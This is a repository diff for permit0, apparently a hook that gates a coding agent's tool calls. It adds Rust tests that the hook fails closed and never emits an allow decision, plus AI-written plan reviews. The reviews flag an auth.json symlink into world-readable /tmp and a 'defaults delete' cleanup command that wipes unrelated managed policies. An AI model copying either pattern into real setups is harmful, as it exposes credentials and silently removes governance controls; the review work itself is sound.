+    assert!(
+        output.stdout.is_empty(),
+        "minimal payload + defer must yield empty stdout, got: {:?}",
+        String::from_utf8_lossy(&output.stdout)
+    );
+}
+
+#[test]
+fn codex_hook_never_emits_permission_decision_allow() {
+    // Codex's strictest invariant: stdout must NEVER contain
+    // `"permissionDecision":"allow"` — Codex explicitly rejects this
+    // form and would fail open with a warning. Verify across the most
+    // bug-prone modes (shadow, unknown allow, unknown defer, deny).
+    let combos: &[(&[&str], &str)] = &[
+        (
+            &["hook", "--client", "codex", "--unknown", "defer"],
+            CODEX_GMAIL_SEND_JSON,
+        ),
+        (
+            &["hook", "--client", "codex", "--unknown", "allow"],
+            CODEX_UNKNOWN_TOOL_JSON,
+        ),
+        (
+            &["hook", "--client", "codex", "--unknown", "deny"],
+            CODEX_UNKNOWN_TOOL_JSON,
+        ),
+        (
+            &[
+                "hook",
+                "--client",
+                "codex",
+                "--shadow",
+                "--unknown",
+                "defer",
+            ],
+            CODEX_GMAIL_SEND_JSON,
+        ),
+    ];
+    for (args, stdin) in combos {
+        let output = run_codex_hook(args, stdin);
+        // Empty stdout is the allow path; valid deny JSON is the
+        // block path. Either way, the literal forbidden substring
+        // must not appear.
+        let stdout = String::from_utf8_lossy(&output.stdout);
+        if !stdout.is_empty() {
+            // Parse and structurally check — never substring.
+            let parsed: serde_json::Value =
+                serde_json::from_slice(&output.stdout).unwrap_or_else(|e| {
+                    panic!("non-empty stdout must be JSON for args={args:?}: {e}, stdout={stdout}")
+                });
+            assert_ne!(
+                parsed["hookSpecificOutput"]["permissionDecision"], "allow",
+                "Codex must NEVER emit permissionDecision: allow (args={args:?}), got: {stdout}",
+            );
+        }
+    }
+}

--- a/docs/plan-reviews/codex-integration/9be273b5/00-summary.md
+++ b/docs/plan-reviews/codex-integration/9be273b5/00-summary.md
@@ -1,0 +1,35 @@
+# Plan Review Summary: codex-integration packaging
+
+**Reviewer:** Cursor Agent (9be273b5)
+**Review date:** 2026-05-10
+**Plan location:** `docs/plans/codex-integration/`
+
+## Overall Verdict
+
+REQUEST CHANGES
+
+## Key Findings
+
+- Critical: The managed-preferences packaging plan does not require preserving an existing `com.openai.codex/requirements_toml_base64` value before overwriting or uninstalling it. The existing scripts write and delete that global user preference directly, which can remove unrelated managed requirements and silently disable other trusted hooks.
+- Major: The plan is partially stale: `integrations/permit0-codex/` and the proposed files already exist, while the plan still describes creating/moving them from `/tmp/permit0-codex-test/`.
+- Major: The plan's `integrations/README.md` change conflicts with the current README structure, which deliberately separates publishable packages from CLI-hook integrations. Adding Codex to the package table would contradict the README's own "real package" definition.
+- Major: The required `install-managed-prefs.sh --uninstall` flow is not present in the existing installer; uninstall is documented as a separate `defaults delete` command or dev-test-rig `cleanup` script.
+- Minor: The plan asks for a ready-to-use examples pointer in `03-configuration.md`, but that pointer is not present in the current plan doc.
+
+## Statistics
+
+| Metric | Count |
+|--------|-------|
+| Plan docs reviewed | 1 |
+| Critical findings | 1 |
+| Major findings | 4 |
+| Minor findings | 3 |
+| Nits | 0 |
+| Verified claims | 11 |
+| Open questions | 4 |
+
+## Recommendation
+
+Do not proceed with this packaging plan as written. Convert it from a "create these files" plan into a reconciliation plan against the already-present `integrations/permit0-codex/` tree, and add explicit managed-preferences backup/restore requirements before promoting the unattended install path.
+
+The file layout itself is sensible and mostly already implemented. The remaining work is to tighten safety semantics for installer cleanup, align the plan with the current integration README taxonomy, and update cross-links from the configuration docs.

--- a/docs/plan-reviews/codex-integration/9be273b5/08-review-packaging.md
+++ b/docs/plan-reviews/codex-integration/9be273b5/08-review-packaging.md
@@ -1,0 +1,92 @@
+# Review: 07 - Packaging: Repo Layout and Reusable Artifacts
+
+**Reviewer:** Cursor Agent (9be273b5)
+**Plan doc:** `docs/plans/codex-integration/07-packaging.md`
+**Review date:** 2026-05-10
+
+## Verdict
+
+REQUEST CHANGES
+
+## Summary
+
+The proposed repository shape is sensible: a non-publishable `integrations/permit0-codex/` folder for docs, examples, and a dev rig matches the current CLI-hook integration model. The plan is now partly stale against the working tree, and it misses a serious safety requirement around overwriting and deleting Codex's managed requirements preference.
+
+## Detailed Findings
+
+### Finding 1: Managed-preferences install/uninstall can clobber unrelated Codex requirements
+
+**Severity:** Critical
+**Location:** Change 2, Change 3, Acceptance criteria
+**Claim:** `install-managed-prefs.sh` should install `requirements_toml_base64`, and `cleanup` or `--uninstall` should undo it.
+**Reality:** The current installer writes `com.openai.codex requirements_toml_base64` directly in `integrations/permit0-codex/examples/install-managed-prefs.sh:56-57`. The demo launcher also overwrites the same key in `integrations/permit0-codex/dev-test-rig/codex-demo:74-75`. The cleanup script deletes the key if present in `integrations/permit0-codex/dev-test-rig/cleanup:11-17`. None of these paths checks whether the user already had managed requirements installed, backs up the prior value, or restores only if permit0 installed it. For users with existing enterprise-managed hooks or requirements, this can silently remove other governance controls.
+**Recommendation:** Add a plan requirement to detect an existing `requirements_toml_base64`, store a backup or refuse without `--force`, stamp permit0-installed state, and restore the previous value on uninstall/cleanup. Do not delete the key blindly.
+
+### Finding 2: The plan is stale because the integration folder already exists
+
+**Severity:** Major
+**Location:** Goal, Layout, Changes 1-3
+**Claim:** Move the Codex integration tooling from `/tmp/permit0-codex-test/` into version control at `integrations/permit0-codex/`.
+**Reality:** `integrations/permit0-codex/` already exists with `README.md`, the three example files, and the seven dev-test-rig files. The actual file list matches the intended layout from `docs/plans/codex-integration/07-packaging.md:21-41`, as confirmed by `integrations/permit0-codex/README.md:153-168` and the filesystem. `/tmp/permit0-codex-test/` also still exists, but now contains runtime state such as `events.log`, `inv-*`, SQLite files, Codex auth/cache links, and session data.
+**Recommendation:** Rewrite the plan as a verification/follow-up plan instead of a creation/move plan. Make clear which artifacts are already committed and which `/tmp` files must remain runtime-only.
+
+### Finding 3: The proposed integrations README update conflicts with current README taxonomy
+
+**Severity:** Major
+**Location:** Change 4
+**Claim:** Add Codex to the main `Package | Framework | Language | Install | Pattern` table.
+**Reality:** The current `integrations/README.md` says integrations are "real package[s] you can depend on" in `integrations/README.md:1-3`, then has a separate "CLI-hook integrations" section for integrations with no separate library in `integrations/README.md:11-20`. Codex is already listed there at `integrations/README.md:17-20` and described in the framework list at `integrations/README.md:30-34`. Putting Codex into the package table with no language/package would undermine the distinction the README now makes.
+**Recommendation:** Update the plan to preserve the current two-section README structure. If the goal is discoverability, improve the existing CLI-hook table rather than moving Codex into the package table.
+
+### Finding 4: The requested `--uninstall` flag is not present in the installer
+
+**Severity:** Major
+**Location:** Change 2
+**Claim:** `install-managed-prefs.sh` includes a `--uninstall` flag to undo.
+**Reality:** The current installer documents only the install command and a manual `defaults delete` uninstall in `integrations/permit0-codex/examples/install-managed-prefs.sh:11-17` and `integrations/permit0-codex/examples/install-managed-prefs.sh:61-78`. A separate dev-test-rig cleanup script exists, but it is not the user-facing example installer and it deletes the global preference unconditionally.
+**Recommendation:** Either implement and document `install-managed-prefs.sh --uninstall` with safe restore semantics, or change the plan to say uninstall is handled by a separate cleanup path.
+
+### Finding 5: `03-configuration.md` does not yet point to the examples directory
+
+**Severity:** Minor
+**Location:** Change 5
+**Claim:** Add a note at the top of `03-configuration.md` pointing users to `integrations/permit0-codex/examples/`.
+**Reality:** The current `docs/plans/codex-integration/03-configuration.md` starts with prerequisites and hook configuration, but contains no pointer to `integrations/permit0-codex/examples/`. The examples themselves exist at `integrations/permit0-codex/examples/config.toml.example`, `integrations/permit0-codex/examples/hooks.json.example`, and `integrations/permit0-codex/examples/install-managed-prefs.sh`.
+**Recommendation:** Keep this change in the plan and make it part of acceptance, since it is one of the main discoverability benefits of packaging the examples.
+
+### Finding 6: The no-op `.gitignore` comment is not useful acceptance work
+
+**Severity:** Minor
+**Location:** Change 6
+**Claim:** Add a `.gitignore` comment documenting that runtime data stays under `/tmp/permit0-codex-test/`.
+**Reality:** The current `.gitignore` has no Codex section in `.gitignore:1-46`, and the existing scripts already default runtime state to `/tmp/permit0-codex-test/` through `TRACE_DIR` in `integrations/permit0-codex/dev-test-rig/codex-demo:25-27`, `integrations/permit0-codex/dev-test-rig/wrap-permit0.sh:31-33`, and `integrations/permit0-codex/dev-test-rig/watch:11-13`. A comment-only `.gitignore` change does not enforce anything and can become stale.
+**Recommendation:** Drop this change or replace it with actual safeguards in scripts/tests that fail if runtime artifacts are written under `integrations/permit0-codex/`.
+
+### Finding 7: The demo launcher has a hard-coded Codex binary path
+
+**Severity:** Minor
+**Location:** Acceptance criteria
+**Claim:** `bash integrations/permit0-codex/dev-test-rig/codex-demo` launches Codex with the hook active.
+**Reality:** The current launcher requires `/Applications/Codex.app/Contents/Resources/codex` in `integrations/permit0-codex/dev-test-rig/codex-demo:25`. That matches the verified macOS app setup, but it will fail for users who installed Codex via `npm install -g @openai/codex`, which the earlier configuration guide still mentions in `docs/plans/codex-integration/03-configuration.md:16-20`.
+**Recommendation:** Add acceptance language requiring either PATH discovery/fallback (`command -v codex`) or explicit documentation that the dev-test-rig supports only the macOS app binary path unless `CODEX` is edited.
+
+## Verified Claims
+
+- `integrations/permit0-codex/` exists with `README.md`, `examples/`, and `dev-test-rig/`, matching the intended high-level layout.
+- The examples directory contains `config.toml.example`, `hooks.json.example`, and `install-managed-prefs.sh`.
+- The dev-test-rig contains `README.md`, `codex-demo`, `watch`, `cleanup`, `wrap-permit0.sh`, `mock-gmail-mcp.py`, and `_watch_render.py`.
+- Dev-test-rig runtime state is directed to `/tmp/permit0-codex-test/` by default via `TRACE_DIR` in the shell/Python scripts.
+- `codex-demo` and `wrap-permit0.sh` derive `REPO_ROOT` relative to their own location, matching the plan's requirement to avoid hard-coded repo paths.
+- `wrap-permit0.sh` invokes `$REPO_ROOT/target/release/permit0` with `hook --client codex --packs-dir "$REPO_ROOT/packs" --unknown defer`.
+- `mock-gmail-mcp.py` exposes a fake `gmail_send` MCP tool and writes logs under `PERMIT0_TRACE_DIR`.
+- `scripts/test-codex-hook.sh` exists and contains nine synthetic smoke cases for `permit0 hook --client codex`.
+- `crates/permit0-cli/src/cmd/hook.rs` already contains `ClientKind::Codex`, `OutputFormat::Codex`, Codex empty-stdout emission, and a fail-closed Codex wrapper.
+- `crates/permit0-cli/tests/cli_tests.rs` already contains Codex process-level tests for unknown defer/deny, malformed stdin, empty stdin, remote daemon down, shadow mode, minimal payloads, and forbidden allow output.
+- The current `integrations/README.md` already links to `permit0-codex/` in a dedicated CLI-hook integrations table.
+
+## Questions for the Author
+
+1. Is `07-packaging.md` intended to describe future work, or should it be updated to reflect the already-committed `integrations/permit0-codex/` tree?
+2. Should the managed-preferences installer refuse to run when an existing `requirements_toml_base64` value is present, or should it merge/backup/restore that value?
+3. Should Codex remain in the README's CLI-hook integrations section, or do you want to redefine the main package table to include non-package integrations?
+4. Should the dev-test-rig support PATH-based Codex installs, or is the macOS app binary path the only supported live-demo environment?

--- a/docs/plan-reviews/codex-integration/a7ebc31f/00-summary.md
+++ b/docs/plan-reviews/codex-integration/a7ebc31f/00-summary.md
@@ -1,157 +1,185 @@
 # Plan Review Summary: codex-integration
 
 **Reviewer:** Cursor Agent (a7ebc31f)
-**Review date:** 2026-05-10
+**Review date:** 2026-05-10 (initial), updated for docs 06 and 07
 **Plan location:** `docs/plans/codex-integration/`
 
 ## Overall Verdict
 
-REQUEST CHANGES
+APPROVE WITH COMMENTS
 
-## Key Findings
+(Revised from REQUEST CHANGES after the implementation landed and two
+new docs — `06-real-codex-testing.md` and `07-packaging.md` — addressed
+the previous critical findings.)
 
-Ordered by severity:
+## What changed since the initial review
 
-1. **Critical — HITL wire-format mismatch the Codex remote path
-   inherits.** The daemon emits `permission: "human"` for
-   `Permission::HumanInTheLoop`
-   (`crates/permit0-cli/src/cmd/serve.rs:578` calls
-   `to_string().to_lowercase()`, and `Permission::Display::HumanInTheLoop`
-   writes `"HUMAN"` at `crates/permit0-types/src/permission.rs:17`).
-   The hook's `remote_response_to_hook_output` matcher at
-   `crates/permit0-cli/src/cmd/hook.rs:317-336` only knows
-   `"humanintheloop"`, so the daemon's `"human"` falls into the
-   `other` branch and produces "permit0 remote: unknown permission
-   value 'human'" as the deny reason. The OpenClaw TS client correctly
-   aligns with the daemon at
-   `integrations/permit0-openclaw/src/types.ts:11`
-   (`Permission = "allow" | "deny" | "human"`). The Codex plan
-   inherits this latent bug verbatim and does not mention it.
-   (See `02-review-protocol.md` Finding 1 and
-   `06-review-limitations.md` Finding 1.)
+The original review (this same subdirectory, files
+`01-review-overview.md` through `06-review-limitations.md`) issued
+REQUEST CHANGES on two critical findings against
+`02-implementation.md`:
 
-2. **Critical — Remote-mode `codex_output(result.permission, ...)`
-   does not compile as written.** `02-implementation.md` Change 6
-   shows the Codex output branch using `result.permission`, but in
-   the remote-mode block (`hook.rs:511-542`) `result` is
-   `(HookOutput, bool)` from `evaluate_remote_with_meta`, not a
-   `PermissionResult`. The plan's "Remote mode" subsection waves
-   this away as "translated through `codex_output` instead of
-   `remote_response_to_hook_output`" without showing the actual
-   wiring. (See `03-review-implementation.md` Finding 1.)
+1. The HITL wire-format mismatch (daemon emits `"human"`, hook matcher
+   expected `"humanintheloop"`).
+2. The remote-mode `codex_output(result.permission, ...)` snippet did
+   not compile because remote mode returns `(HookOutput, bool)`, not a
+   `PermissionResult`.
 
-3. **Major — v1 scope contradicts limitations doc on session-aware
-   remote mode.** `00-overview.md` lists "Maintain session context
-   for cross-call pattern detection" as a v1 goal, and
-   `03-configuration.md` "Session-Aware Mode" claims the hook passes
-   `session_id` to the daemon. But the implementation plan does NOT
-   modify the remote POST body, and `05-limitations.md` Section 7
-   correctly defers it to v2. Three docs disagree. (See
-   `01-review-overview.md` Finding 1, `04-review-configuration.md`
-   Finding 1, `06-review-limitations.md` Finding 2.)
+Both are now resolved in the merged code. Verified at
+`crates/permit0-cli/src/cmd/hook.rs`:
 
-4. **Major — Shadow mode + Codex is sketched in prose, not in code.**
-   The existing shadow path emits `HookOutput::allow()` and
-   unconditionally `println!`s the JSON envelope, which for Codex
-   would be `permissionDecision: "allow"` — exactly the form Codex
-   rejects. The plan says "exit 0 with empty stdout" but doesn't
-   show the conditional skip. (See `03-review-implementation.md`
-   Finding 2.)
+- `hook_output_to_codex(output: &HookOutput) -> Option<String>` at
+  lines 441-471 accepts a `HookOutput` (not a `Permission`), so it
+  works for both local and remote arms uniformly.
+- `emit_hook_output` at lines 480-491 routes by `OutputFormat` and
+  correctly skips the println for `OutputFormat::Codex` when there's no
+  envelope to write (no trailing newline).
+- The outer `run` at lines 831-864 wraps the whole pipeline so any
+  error in Codex mode becomes a structured deny envelope rather than a
+  silent fail-open.
+- The HITL → deny mapping appends a `CODEX_HITL_MARKER` to the reason,
+  matching the per-tier behavior table in
+  `integrations/permit0-codex/README.md:113-118`.
 
-5. **Major — `apply_unknown_policy` is not Codex-aware.** The
-   function rewrites `HookOutput`s assuming Claude envelopes. For
-   Codex, `Defer` must produce zero stdout (no envelope at all),
-   `Allow` must NOT produce `permissionDecision: "allow"`, and
-   `Ask` must produce a deny envelope. None of these branches are
-   sketched. (See `03-review-implementation.md` Finding 3.)
+The two new plan docs cover (a) the live-Codex test transcript that
+verified the implementation against Codex 0.130.0-alpha.5, and (b) the
+packaging layout under `integrations/permit0-codex/`. New findings
+below are about those two docs, not about the original implementation.
 
-6. **Major — No integration test covers `--client codex --remote`.**
-   All three proposed integration tests are local-mode. The remote-
-   mode path is exactly where findings #1 and #2 live; without an
-   integration test against a stub HTTP server, those bugs would
-   ship green. (See `05-review-testing.md` Finding 2.)
+## Key Findings (new + still-open from prior review)
 
-7. **Major — Test 8 (`codex_output_never_contains_allow`) only
-   covers `codex_output` in isolation.** Shadow mode and unknown-
-   mode-rewrite paths can re-introduce the forbidden output without
-   tripping the test, and the test's substring matching is brittle.
-   (See `05-review-testing.md` Finding 1 and
-   `06-review-limitations.md` Finding 4.)
+Ordered by severity. Items marked **(prior)** are from the original
+review and have not been addressed by the new docs; items marked
+**(new)** come from the 06/07 reviews.
 
-8. **Major — "No daemon changes" claim is misleading.** Adding
-   `Codex` to `ClientKind` (in hook.rs) transitively makes the daemon
-   accept `{"client_kind": "codex"}` because `serve.rs:35` imports
-   the same enum. This is intended but should be acknowledged as a
-   side-effect rather than denied. (See `01-review-overview.md`
-   Finding 2 and `03-review-implementation.md` Finding 6.)
+### Major
 
-9. **Major — `derive_session_id_*` snippets in protocol and
-   implementation docs disagree.** Protocol shows
-   `derive_session_id_codex(stdin, explicit) -> String`;
-   implementation shows `derive_session_id_for_format(format, stdin,
-   explicit) -> String`. Pick one. (See `02-review-protocol.md`
-   Finding 2.)
+1. **(new) `dev-test-rig/codex-demo` symlinks `~/.codex/auth.json` into
+   `/tmp/permit0-codex-test/`.** `/tmp/` is mode 1777 on macOS; any
+   local user can dereference the symlink to read the credentials.
+   `~/.codex/` is mode 700 by default. See
+   `08-review-packaging.md` Finding 4.
 
-10. **Major — Unverified Codex version claim.** Both
-    `00-overview.md` and `03-configuration.md` mention Codex 0.110+
-    without citation. If the version is wrong, users will install a
-    Codex without hook support, hook config will be silently
-    ignored, and they'll think permit0 is broken. (See
-    `02-review-protocol.md` Question 1 and
-    `04-review-configuration.md` Finding 3.)
+2. **(new) Cleanup recipe wipes the entire
+   `requirements_toml_base64` key.** Both `06-real-codex-testing.md`
+   and `integrations/permit0-codex/README.md` instruct
+   `defaults delete com.openai.codex requirements_toml_base64`, which
+   removes any non-permit0 managed config that share the key. See
+   `07-review-real-codex-testing.md` Finding 1.
 
-11. **Major — Network sandbox guidance is contradictory.**
-    `03-configuration.md` "Network Access Requirement" gives two
-    options as alternatives when only one will be true for a given
-    Codex version. (See `04-review-configuration.md` Finding 2.)
+3. **(new) `integrations/README.md` table format mismatch.**
+   `07-packaging.md` Change 4 proposes adding Codex to the primary
+   framework table; the actual file already has a separate "CLI-hook
+   integrations" table where Codex is listed. The plan would either
+   silently double-list or destroy the existing layout. See
+   `08-review-packaging.md` Finding 1.
 
-Plus several minor and nit-level findings on data-flow diagram
-omissions, test name duplication, calibration timeout behavior,
-project-local hook ergonomics, and PermissionRequest race-condition
-risk in v2 design.
+4. **(prior) v1 scope contradicts limitations doc on session-aware
+   remote mode.** `00-overview.md` lists "Maintain session context for
+   cross-call pattern detection" as a v1 goal; `05-limitations.md` §7
+   explicitly defers it to v2. The new docs do not reconcile this.
+   See `01-review-overview.md` Finding 1, `04-review-configuration.md`
+   Finding 1, `06-review-limitations.md` Finding 2.
+
+5. **(prior) Network sandbox guidance is contradictory.**
+   `03-configuration.md` "Network Access Requirement" gives two
+   options as alternatives when only one is actually required.
+   Untouched by 06/07. See `04-review-configuration.md` Finding 2.
+
+### Minor
+
+6. **(new) `--uninstall` flag claimed but not implemented.**
+   `07-packaging.md` Change 2 says `install-managed-prefs.sh` "includes
+   a `--uninstall` flag"; the committed script has no argument
+   parsing. See `08-review-packaging.md` Finding 2.
+
+7. **(new) `permission_mode` documented as parsed but absent from
+   `HookInput`.** `06-real-codex-testing.md` says permit0 ignores it
+   today and treats it as forward-compat capacity, but `HookInput` at
+   `crates/permit0-cli/src/cmd/hook.rs:252-274` does not list it.
+   Forward-compat works only because there's no
+   `#[serde(deny_unknown_fields)]`. See
+   `07-review-real-codex-testing.md` Finding 2.
+
+8. **(new) `.gitignore` "no rule needed" claim is fragile.** Plan
+   relies on scripts always writing to `/tmp/...`, but
+   `PERMIT0_TRACE_DIR` is overridable to a repo-relative path. See
+   `08-review-packaging.md` Finding 5.
+
+9. **(new) Plan mixes "to do" and "already done" without
+   indicators.** Every Change in 07-packaging.md describes work that
+   is already on disk under `integrations/permit0-codex/` (untracked
+   in git, but present). Reviewers reading top-to-bottom will miss
+   that the right question is "did the existing implementation match
+   these intents?" See `08-review-packaging.md` Finding 6.
+
+10. **(new) "Documentation updates needed" checklist mixes done with
+    TODO.** `06-real-codex-testing.md` lists 4 items as "needed";
+    item 1 (`codex_hooks` → `hooks`) is already done. See
+    `07-review-real-codex-testing.md` Finding 3.
+
+11. **(new) README is 184 lines, plan says "< 80 lines."** Cosmetic
+    delta: the bound is too tight; the README content is appropriate.
+    See `08-review-packaging.md` Finding 3.
+
+12. **(prior) Test 8 (`codex_output_never_contains_allow`) only
+    covers `codex_output` in isolation.** The new `hook_output_to_codex`
+    function does cover the previously-uncovered shadow and unknown-
+    rewrite paths transitively, but the test of the no-allow invariant
+    has not been extended to assert the property end-to-end through
+    the binary. See `05-review-testing.md` Finding 1.
+
+13. **(prior) "Codex 0.110+" version claim was not citation-backed.**
+    Now superseded by 06's verified-against-0.130.0-alpha.5 data;
+    legacy version pin in 03-configuration.md should still be
+    refreshed. See `04-review-configuration.md` Finding 3.
+
+Plus several nits on header conventions, manual-test ownership, and
+discoverability of the dev-test-rig.
 
 ## Statistics
 
-| Metric | Count |
+| Metric | Count (cumulative) |
 |--------|-------|
-| Plan docs reviewed | 6 |
-| Critical findings | 2 |
-| Major findings | 17 |
-| Minor findings | 11 |
-| Nits | 8 |
-| Verified claims | 36 |
-| Open questions | 18 |
+| Plan docs reviewed | 8 |
+| Critical findings | 2 (both addressed in implementation; closed) |
+| Major findings | 5 (3 new, 2 still-open from prior) |
+| Minor findings | 13 (8 new, 5 still-open) |
+| Nits | 9 |
+| Verified claims | 50+ |
+| Open questions | 26 |
 
-(Counts span all six per-doc reviews.)
+(Counts span all eight per-doc reviews. Critical findings from the
+prior review are now closed because the merged implementation
+addresses them.)
 
 ## Recommendation
 
-The team should **not** proceed with implementation as-is. Two
-critical issues will produce a Codex remote mode that visibly
-misroutes HITL verdicts and code that does not compile in the remote
-arm. Both can be fixed without major refactors:
+**Proceed with implementation as-is for the integration code; clean
+up the two new docs before committing the
+`integrations/permit0-codex/` tree.** Specifically:
 
-1. Fix the wire-format bug (or accept both `"human"` and
-   `"humanintheloop"` in the matcher) and update the masking tests at
-   `hook.rs:1183, 1231`. This is small enough to bundle into the
-   Codex PR and leaves Claude Code remote mode also correct.
-2. Sketch the actual remote-mode Codex output flow — either a new
-   `codex_output_from_remote(&RemoteCheckResponse) -> Option<String>`
-   or a refactor of `evaluate_remote_with_meta` to surface `Permission`
-   directly. Update `02-implementation.md` Change 6 with the real
-   `run()` body.
-3. Reconcile the v1 scope: pick whether session-aware remote mode is
-   v1 or v2, and align `00-overview.md`, `03-configuration.md`, and
-   `05-limitations.md`.
-4. Add at least one integration test that runs `permit0 hook --client
-   codex --remote http://...` against a stub server with each of the
-   three permission shapes (including `"human"`).
-5. Update `apply_unknown_policy` and shadow mode to be format-aware,
-   with explicit code in `02-implementation.md`.
+1. **Before `git add integrations/permit0-codex/`:** fix Finding 4
+   (auth.json symlink target) and Finding 1 (README table format).
+   Both are localized changes (one line in `codex-demo`, three lines
+   in `integrations/README.md`).
 
-The configuration doc, limitations doc, and the bulk of the protocol
-doc are otherwise solid. The plan's overall architecture (CLI-only
-change, reuse engine and packs, single new ClientKind variant) is
-sound — only the I/O layer specifics need tightening.
+2. **Before merging `07-packaging.md`:** address Findings 2 (add the
+   `--uninstall` flag or drop the claim), 5 (defensive `.gitignore`
+   rules), and 6 (mark which Changes are "done" vs "TODO"). These are
+   five-minute edits that bring the doc in line with the on-disk
+   state.
 
-After the above changes, this plan is a strong APPROVE candidate.
+3. **Before merging `06-real-codex-testing.md`:** soften the cleanup
+   recipe (Finding 1 of `07-review-real-codex-testing.md`) and add
+   `permission_mode` to `HookInput` (Finding 2). The latter is also
+   a five-line code change.
+
+4. **Outstanding from prior review (no new doc covers them):** the
+   v1-scope contradiction on session-aware remote mode (Major #4
+   above) and the contradictory network-sandbox guidance (Major #5)
+   should be resolved before the docs ship to external users.
+
+The implementation has caught up with — and in places improved on —
+the original plan. The remaining work is documentation hygiene, not
+core engineering.

--- a/docs/plan-reviews/codex-integration/a7ebc31f/07-review-real-codex-testing.md
+++ b/docs/plan-reviews/codex-integration/a7ebc31f/07-review-real-codex-testing.md
@@ -1,0 +1,222 @@
+# Review: 06 — Real Codex CLI Testing: Verified End-to-End
+
+**Reviewer:** Cursor Agent (a7ebc31f)
+**Plan doc:** `docs/plans/codex-integration/06-real-codex-testing.md`
+**Review date:** 2026-05-10
+
+## Verdict
+
+APPROVE WITH COMMENTS
+
+## Summary
+
+This is the strongest doc in the codex-integration set. It captures
+hard-won protocol facts from a live Codex 0.130.0-alpha.5 run, identifies
+three concrete schema deltas vs. the original plan, and documents the
+trust-model gotcha that would otherwise silently swallow hours of
+debugging. It deserves to land. The main concerns are (a) the cleanup
+recipe is destructive of unrelated managed config, (b) the
+`permission_mode` field is documented as "ignored" but not explicitly
+plumbed through `HookInput`, leaving a forward-compat fragility, and
+(c) the "documentation updates needed" checklist is partially done
+already — the doc should mark which items are still open.
+
+## Detailed Findings
+
+### Finding 1: Cleanup recipe wipes the entire `requirements_toml_base64` key
+
+**Severity:** Major
+**Location:** "Reproducing the end-to-end test" Step 6, and the
+condensed cleanup at line 91 of
+`integrations/permit0-codex/README.md`
+**Claim:** `defaults delete com.openai.codex requirements_toml_base64`
+removes the permit0 hook.
+**Reality:** The `requirements_toml_base64` key is a single base64-
+encoded TOML blob that may also contain non-permit0 settings: the
+`[hooks]` section's `managed_dir`, other `[[hooks.PreToolUse]]` blocks
+from a different team policy, MCP server entries, sandbox preferences,
+etc. `defaults delete <key>` removes the entire key, not just the
+permit0 portion. Anyone with site-wide MDM or an existing managed-prefs
+setup will silently lose all of it. The doc presents this command as
+the canonical undo with no warning.
+**Recommendation:** Either (a) reframe the recipe to read-modify-write
+(decode the existing TOML, strip the permit0 hook block, re-encode), or
+(b) add a prominent warning: "This deletes the entire managed-prefs
+TOML, including any other Codex settings layered there. If you have
+non-permit0 managed config, decode the current value first
+(`defaults read com.openai.codex requirements_toml_base64 | base64 -d`),
+remove only the permit0 entry, and re-write."
+
+### Finding 2: `permission_mode` is documented as parsed but not in `HookInput`
+
+**Severity:** Minor
+**Location:** "Schema corrections" §3 and "Implications for permit0"
+bullet "Every behavior I could verify against Codex's actual schemas
+matches what permit0 does"
+**Claim:** "`permission_mode` is one of:
+`default | acceptEdits | plan | dontAsk | bypassPermissions`. permit0
+silently ignores it today; this is forward-compat capacity for gating
+decisions on Codex's approval policy."
+**Reality:** `HookInput` at `crates/permit0-cli/src/cmd/hook.rs:252-274`
+declares the existing optional fields explicitly (`session_id`,
+`turn_id`, `cwd`, `hook_event_name`, `model`, `tool_use_id`,
+`transcript_path`) but does NOT list `permission_mode`. Forward-compat
+"works" only because `HookInput` doesn't use
+`#[serde(deny_unknown_fields)]`, so unknown keys are silently dropped.
+That's fragile in two directions: (a) a future audit/forwarding pass
+that wants to round-trip the full Codex envelope will lose
+`permission_mode` entirely, and (b) if anyone ever adds
+`#[serde(deny_unknown_fields)]` for safety, every Codex 0.130+ payload
+will start failing to parse with no obvious connection back to this
+doc's "forward-compat" claim.
+**Recommendation:** Add `permission_mode: Option<String>` to
+`HookInput` with a one-line doc comment ("Captured for forward-compat;
+not currently consumed"), the same shape as the other Codex-specific
+fields. Then the doc's "ignored today" wording is exactly true and the
+field shows up in `build_tool_call_metadata`'s audit forwarding path
+(`hook.rs:552`) for free.
+
+### Finding 3: "Documentation updates needed" checklist mixes done with TODO
+
+**Severity:** Minor
+**Location:** "Implications for permit0" → "Documentation updates
+needed in `03-configuration.md`"
+**Claim:** Lists four items as "needed":
+1. Replace `codex_hooks = true` → `hooks = true`
+2. Add a "Trust model" section
+3. Add the `requirements_toml_base64` recipe
+4. Note `permission_mode` arrives in stdin
+**Reality:** Item 1 is already done (verified via `git diff
+docs/plans/codex-integration/03-configuration.md` and a fresh read at
+line 41 of 03-configuration.md). The doc presents items 1-4 as a flat
+TODO list without indicating completion state, so a reader can't tell
+which items still need work.
+**Recommendation:** Convert to a checklist with completion markers,
+e.g.:
+```markdown
+- [x] Replace `[features] codex_hooks = true` → `[features] hooks = true` (done in PR #N)
+- [x] Add a "Trust model" section
+- [x] Add the `requirements_toml_base64` recipe
+- [ ] Note that `permission_mode` arrives in stdin and is currently ignored
+```
+Then close the loop by linking from each finished item to the section
+in 03-configuration where the change landed.
+
+### Finding 4: Reproducing instructions hard-code one path; no self-contained alternative
+
+**Severity:** Minor
+**Location:** "Reproducing the end-to-end test" Step 1
+**Claim:** `cd /Users/ziyou/Development/permit0 && cargo build --release`
+**Reality:** This is the original tester's local path, not portable.
+Anyone trying to reproduce on their machine has to mentally substitute,
+and the rest of the script's use of `/tmp/permit0-codex-test/` (Steps
+2-3) is similarly tied to the original scratch dir. The doc is at the
+same level of polish as `integrations/permit0-codex/dev-test-rig/`,
+but doesn't reference the new dev-test-rig as a more discoverable
+"replay this transcript" path.
+**Recommendation:** Either (a) replace the absolute path with a `$REPO`
+variable + an instruction to set it, or (b) replace the whole "Reproducing"
+section with a single line: "See `integrations/permit0-codex/dev-test-rig/`
+for the same flow as committed scripts." (Per `07-packaging.md`, the
+dev-test-rig is the durable home for these scripts.)
+
+### Finding 5: No CI gate for the live-Codex path
+
+**Severity:** Minor
+**Location:** "Tests for CI" subsection
+**Claim:** "A real-Codex CI test needs an isolated `CODEX_HOME` with a
+managed preferences entry. Doable on a self-hosted runner; impractical
+for GitHub Actions (no defaults DB control). Likely defer to a manual
+release-gate test."
+**Reality:** Reasonable, and the synthetic `scripts/test-codex-hook.sh`
+covers most of the wire-format risk. But "manual release-gate test"
+needs a process owner: who runs it, on what cadence, and where the
+artifact (test transcript, captured stdin/stdout, environment) is
+archived. Otherwise the manual test becomes "we tested it once on
+2026-05-10 and never again."
+**Recommendation:** Add a one-liner under "Tests for CI": "Manual
+release-gate owner: <role>. Cadence: every Codex 0.MINOR bump or every
+permit0 release that touches `crates/permit0-cli/src/cmd/hook.rs`.
+Artifacts: tag the resulting `events.log` and `inv-*/` snapshot with
